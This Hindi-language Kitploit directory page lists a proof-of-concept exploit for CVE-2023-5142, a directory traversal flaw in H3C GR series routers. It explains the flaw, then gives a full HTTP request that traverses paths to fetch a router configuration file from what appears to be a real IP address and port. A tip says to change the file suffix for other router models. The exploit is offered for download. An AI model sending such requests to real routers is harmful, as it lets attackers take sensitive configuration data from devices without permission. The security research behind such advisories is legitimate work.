Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-H3C-Report — CVE-2023-5142 के लिए PoC एक्सप्लॉइट जो H3C GR सीरीज़ राउटर्स को लक्षित करता है, जिसमें बिना प्रमाणीकरण वाली डायरेक्टरी ट्रैवर्सल भेद्यता के माध्यम से संवेदनशील कॉन्फ़िगरेशन फ़ाइलें निकाली जाती हैं। | Kitploit
उपकरण/GitHubGitHub/kuangxiaotu/cve-h3c-report
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनागलत कॉन्फ़िगरेशन
GitHubkuangxiaotu/cve-h3c-report

CVE-H3C-Report

CVE-2023-5142 के लिए PoC एक्सप्लॉइट जो H3C GR सीरीज़ राउटर्स को लक्षित करता है, जिसमें बिना प्रमाणीकरण वाली डायरेक्टरी ट्रैवर्सल भेद्यता के माध्यम से संवेदनशील कॉन्फ़िगरेशन फ़ाइलें निकाली जाती हैं।

रिपॉजिटरी देखें
243 साल पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

H3C GR सीरीज़ राउटर सिस्टम प्रबंधन में अनधिकृत पहुंच भेद्यता

उत्पाद: GR सीरीज़ राउटर

संस्करण: सभी

रेटिंग: उच्च-जोखिम

वेबसाइट: http://www.h3c.com/

खतरे: हमलावर इस भेद्यता का उपयोग करके विशेष अनुरोध पैकेट बनाकर पहचान सत्यापन को दरकिनार कर राउटर से संवेदनशील जानकारी प्राप्त कर सकते हैं।

सिद्धांत: राउटर ने निर्देशिका पहुंच और संबंधित फाइलों को प्रमाणित नहीं किया।

exp:

नोट: POC में फ़ाइल नाम प्रत्यय को संशोधित करना आवश्यक है, जैसे GR8300.cfg

root@kitploit:~
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image

image

image

टूल डाउनलोड करें